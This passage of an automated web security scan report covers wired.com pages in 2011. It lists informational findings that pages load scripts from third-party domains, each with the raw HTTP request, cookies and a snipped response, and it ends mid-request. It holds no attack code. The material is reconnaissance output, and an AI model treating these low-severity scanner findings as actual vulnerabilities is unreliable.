Expires: Wed, 12 Jan 2011 15:46:09 GMT
Date: Wed, 12 Jan 2011 15:38:23 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 99556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.76. http://www.wired.com/js/global.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/js/global.js

Issue detail

The response dynamically includes the following script from another domain:

http://0/

Request

GET /js/global.js HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:12:44 GMT
Date: Wed, 12 Jan 2011 05:02:44 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 37327

//mobify include
var _mm = "http://m.wired.com/";

(function() {
if(document.domain.indexOf("howto.wired.com")>=0) {
return;
}
if(document.domain.indexOf("wired.com")>=0) {

...[SNIP]...
)
document.addEventListener("DOMContentLoaded", init, false);

// for Internet Explorer
/*@cc_on @*/
/*@if (@_win32)
document.write("<script id=__ie_onload defer src=//0><\/scr"+"ipt>
...[SNIP]...

16.77. http://www.wired.com/magazine/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/magazine/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
X-Pingback: http://www.wired.com/magazine/xmlrpc.php
Last-Modified: Wed, 12 Jan 2011 11:23:30 GMT
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Cache-Control: no-cache, must-revalidate
Expires: Wed, 12 Jan 2011 15:39:00 GMT
Date: Wed, 12 Jan 2011 15:39:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 81454

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.78. http://www.wired.com/magazine/decode/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/magazine/decode/

Issue detail

The response dynamically includes the following script from another domain:

http://www.google-analytics.com/urchin.js

Request

GET /magazine/decode/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

16.79. http://www.wired.com/magazine/ipad previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/magazine/ipad

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://d.yimg.com/ds/badge.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js
http://www.reddit.com/static/button/button1.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 12:28:46 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:04 GMT
Date: Wed, 12 Jan 2011 15:39:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70412

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...

           <script type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" language="javascript" src="http://www.reddit.com/static/button/button1.js"></script>
...[SNIP]...
<div id="sb_art_yahoo" class="social">
<script showbranding="0" src="http://d.yimg.com/ds/badge.js" badgetype="text">wired:http://www.wired.com/magazine/ipad/</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.80. http://www.wired.com/medtech/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/medtech/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /medtech/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=245
Expires: Wed, 12 Jan 2011 15:40:34 GMT
Date: Wed, 12 Jan 2011 15:36:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 69903

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.81. http://www.wired.com/nolayout/rssproxy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/nolayout/rssproxy

Issue detail

The response dynamically includes the following scripts from other domains:

http://service.collarity.com/ucs/tracker.js
http://www.google-analytics.com/urchin.js

Request

GET /nolayout/rssproxy HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Accept-Ranges: bytes
Content-Length: 24466
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Date: Wed, 12 Jan 2011 15:41:19 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://service.collarity.com/ucs/tracker.js">
</script>
...[SNIP]...

16.82. http://www.wired.com/playbook/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/playbook/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:03:45 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=394
Expires: Wed, 12 Jan 2011 15:46:29 GMT
Date: Wed, 12 Jan 2011 15:39:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134055

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.83. http://www.wired.com/politics/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/politics/

Issue detail

The response dynamically includes the following scripts from other domains:

http://admin.brightcove.com/js/BrightcoveExperiences.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://www.google-analytics.com/urchin.js

Request

GET /politics/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/html; charset=UTF-8
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 15:46:48 GMT
Date: Wed, 12 Jan 2011 15:36:48 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 70029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml
...[SNIP]...
</script>

<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<script language="JavaScript" type="text/javascript" src="http://admin.brightcove.com/js/BrightcoveExperiences.js"></script>
...[SNIP]...


<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.84. http://www.wired.com/rawfile/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/rawfile/

Issue detail

The response dynamically includes the following scripts from other domains:

http://lite.piclens.com/current/piclens_optimized.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://use.typekit.com/ztc8lol.js
http://widgets.amung.us/classic.js
http://www.google-analytics.com/urchin.js

Request

GET /rawfile/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 13:25:24 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=480
Expires: Wed, 12 Jan 2011 15:47:56 GMT
Date: Wed, 12 Jan 2011 15:39:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 167807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://lite.piclens.com/current/piclens_optimized.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://use.typekit.com/ztc8lol.js"></script>
...[SNIP]...
</div>
<script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
<div class="xrailComponent">
<script type="text/javascript" src="http://widgets.amung.us/classic.js"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.85. http://www.wired.com/reviews/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+19ed60229e60f2971e8df377934793461f80e3b1+1294844616
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:03:37 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=462
Expires: Wed, 12 Jan 2011 15:44:31 GMT
Date: Wed, 12 Jan 2011 15:36:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53770

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+19ed60229e60f2971e8df377934793461f80e3b1+1294844616"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.86. http://www.wired.com/reviews/%20 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/%20

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+341c71a9e6631583321c56a6363e335fa32b96af+1294846100
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/%20 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:28:22 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=445
Expires: Wed, 12 Jan 2011 15:44:14 GMT
Date: Wed, 12 Jan 2011 15:36:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 53774

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+341c71a9e6631583321c56a6363e335fa32b96af+1294846100"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.87. http://www.wired.com/reviews/category/automotive/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/automotive/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+996f2ee0e424f8826829883c1c48da62f4667b81+1294846431
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/automotive/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:33:51 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=477
Expires: Wed, 12 Jan 2011 15:44:49 GMT
Date: Wed, 12 Jan 2011 15:36:52 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60199

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+996f2ee0e424f8826829883c1c48da62f4667b81+1294846431"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.88. http://www.wired.com/reviews/category/desktops-and-accessories/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/desktops-and-accessories/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+a4b610ab9983549233daed020ecbd113d48ac015+1294843070
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/desktops-and-accessories/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 14:37:50 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=453
Expires: Wed, 12 Jan 2011 15:44:28 GMT
Date: Wed, 12 Jan 2011 15:36:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 61151

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+a4b610ab9983549233daed020ecbd113d48ac015+1294843070"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.89. http://www.wired.com/reviews/category/digital-cameras-and-camcorders/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/digital-cameras-and-camcorders/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e73ce92b91cc87850f4defb338d49d014c7abf20+1294846055
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/digital-cameras-and-camcorders/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:27:36 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=446
Expires: Wed, 12 Jan 2011 15:44:21 GMT
Date: Wed, 12 Jan 2011 15:36:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60991

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+e73ce92b91cc87850f4defb338d49d014c7abf20+1294846055"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.90. http://www.wired.com/reviews/category/gaming-gear/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/gaming-gear/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bc55cce9b1a8af3a2aaf8f8de044e321e5a7da1a+1294846603
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/gaming-gear/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/5.2.6
Last-Modified: Wed, 12 Jan 2011 15:36:44 +0000
Content-Type: text/html;charset=UTF-8
Cache-Control: must-revalidate, max-age=424
Expires: Wed, 12 Jan 2011 15:44:01 GMT
Date: Wed, 12 Jan 2011 15:36:57 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script type="text/javascript" src="http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+bc55cce9b1a8af3a2aaf8f8de044e321e5a7da1a+1294846603"></script>
...[SNIP]...
<div id="search_widget">
<script type="text/javascript" src="http://www.google.com/jsapi"></script>
...[SNIP]...
</form>
<script type="text/javascript" src="http://www.google.com/cse/brand?form=cse-search-box&lang=en"></script>
...[SNIP]...

<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

16.91. http://www.wired.com/reviews/category/home-audio-and-video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.wired.com
Path:	/reviews/category/home-audio-and-video/

Issue detail

The response dynamically includes the following scripts from other domains:

http://wiredreviews.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+444a62150484244cb53b00a25beec5d3cb07d94d+1294843325
http://www.google-analytics.com/urchin.js
http://www.google.com/cse/brand?form=cse-search-box&lang=en
http://www.google.com/jsapi

Request

GET /reviews/category/home-audio-and-video/ HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
